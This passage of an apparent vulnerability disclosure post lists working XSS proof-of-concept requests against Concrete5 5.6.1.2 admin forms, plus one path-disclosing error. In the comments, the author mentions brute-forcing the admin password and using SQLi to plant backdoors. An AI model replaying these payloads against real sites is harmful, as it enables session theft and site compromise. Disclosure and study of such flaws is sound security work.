input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


25. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization

---< request >---

26. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


27. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 965

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


28. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 952

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1="%20body%20onload%3d"alert(4321)"%3e&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

29. information disclosure
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/access_entity HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

task=save_permissions&accessType=10&peID=6&pdID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&pdStartDate_activate=on&pdStartDate_dt=8%2F12%2F2013&pdStartDate_h=9&pdStartDate_m=16&pdStartDate_a=AM&pdEndDate_activate=on&pdEndDate_dt=8%2F12%2F2013&pdEndDate_h=9&pdEndDate_m=16&pdEndDate_a=AM&pdRepeatPeriod=&pdRepeatPeriodDaysEvery=1&pdRepeatPeriodMonthsRepeatBy=month&pdRepeatPeriodMonthsEvery=1&pdRepeatPeriodWeeksDays%5B%5D=1&pdRepeatPeriodWeeksEvery=1&pdEndRepeatDate=
---< request >---


resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:19:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html


Fatal error: Call to a member function setStartDateAllDay() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/duration.php on line 205


30. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/basics/site_name/update_sitename/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 142

ccm_token=1376292237%3A47e17cc29a3b0e20cd35e618aebc20d8&SITE='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&ccm-submit-site-form=Save
---< request >---

31. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/tracking_codes/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 190

ccm_token=1376292246%3A18fb91291997356ac1a2f84e7edd3e07&tracking_code='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&tracking_code_position=bottom&ccm-submit-tracking-code-form=Save
---< request >---


32. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/excluded/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 87

SEO_EXCLUDE_WORDS='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&ccm-submit-button=Save
---< request >---

33. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 210

miID=1&miEmail='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&miIsEnabled=0&miServer=asd&miUsername=asd&miPassword=asd&miEncryption=&miPort=asd&miConnectionMethod=POP&ccm-submit-mail-importer-form=Save
---< request >---

Let me know if you have any questions.

Enjoy ;)

2 comments:

  1. Have you reported these problems to Concrete5?
    I can't find them in their bug tracker:
    www.concrete5.org/developers/bugs/

    I understand all these vulnerabilities are possible to exploit only after successful authentication on an admin account.
    What is the reason to attack the database by SQL injection, when you already have admin access to it (you are logged in as admin)?
    How can you exploit the above XSS vulnerabilities? I mean a real attack scenario? I guess these are reflected ones?

  2. 1. Yes, I sent them information on 13.08.2012, 27.11.2012 and 15.01.2013
    about possible vulnerabilities. And because they ignored it 'because it's exploitable from admin' - I decided to write a small tool to bruteforce the admin password, and then show a few examples of vulnerabilities.

    2. Depends. Try to check if you're able to make some CSRF attacks too.

    3. A real attack scenario of exploitation was presented in a few places on the web, for example at the BlackHat conference(s).

    4. What is the reason to attack by SQLi - depends. Maybe if you want to add some backdoor and not set on the page that you 'hacked it', maybe it's a good reason. Or maybe to make some other privilege escalation attacks.


What do You think...?